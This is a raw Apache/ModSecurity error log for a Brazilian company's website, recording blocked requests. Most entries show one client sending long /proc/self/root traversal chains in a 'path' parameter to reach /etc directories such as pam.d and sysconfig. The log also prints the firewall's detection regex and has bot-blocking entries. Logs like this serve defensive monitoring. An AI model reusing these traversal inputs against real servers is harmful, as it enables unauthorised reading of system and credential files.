[Wed Mar 18 04:46:17.406301 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.241.31:36214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpYSSmAPhZkrhU8w4k01AAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:46:25.066160 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:49224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpYUQkwaGbbGflqUZDZGQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:46:36.664364 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:49226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpYXNY0UrI5A3LftIxbCgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:46:55.470345 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:59904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpYbymAPhZkrhU8w4k05gAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:47:13.962788 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.244.43:60728] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpYgcdf6f5d65gmYZSYNAAAAtY"]
[Wed Mar 18 04:47:14.627013 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.228.61:58568] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpYgtY0UrI5A3LftIxbOQAAAYY"]
[Wed Mar 18 04:47:20.511460 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:34538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpYiOw_le52K8_3pV2ndQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:48:39.849823 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:45098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpY1_u8EFLIOrSqIpvN2QAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:48:46.000233 2026] [access_compat:error] [pid 30077:tid 140411557287680] [client 103.249.81.106:15194] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 04:49:47.135630 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:39966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZG9Y0UrI5A3LftIxcRgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:49:57.255109 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:45526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZJcdf6f5d65gmYZSYUQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:50:00.635514 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:32812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZKOyqAr6etmhZHNqBbAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:50:02.599995 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:32828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZKta6ubjKNq_cu4ZdyQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:51:29.998017 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:32832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZgew_le52K8_3pV2n5gAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:51:33.563549 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:47156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZhSmAPhZkrhU8w4k1DAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:52:26.723465 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:47170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZuuoXxyEfFpUF8f80GQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:52:41.179372 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:37606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZydY0UrI5A3LftIxc8wAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:52:55.667296 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:45852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpZ1_u8EFLIOrSqIpvOCAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:54:37.841162 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:36988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpaPUzinOy1jxa1j4fadwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 04:55:08.807967 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:33280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpaXMdf6f5d65gmYZSYrQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:55:20.635336 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:55760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpaaNY0UrI5A3LftIxdHAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:55:36.530365 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:34436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpad-oXxyEfFpUF8f80lgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:55:54.913302 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:40252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpaiimAPhZkrhU8w4k1TAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:56:44.079218 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:35276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpavOyqAr6etmhZHNqB1gAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
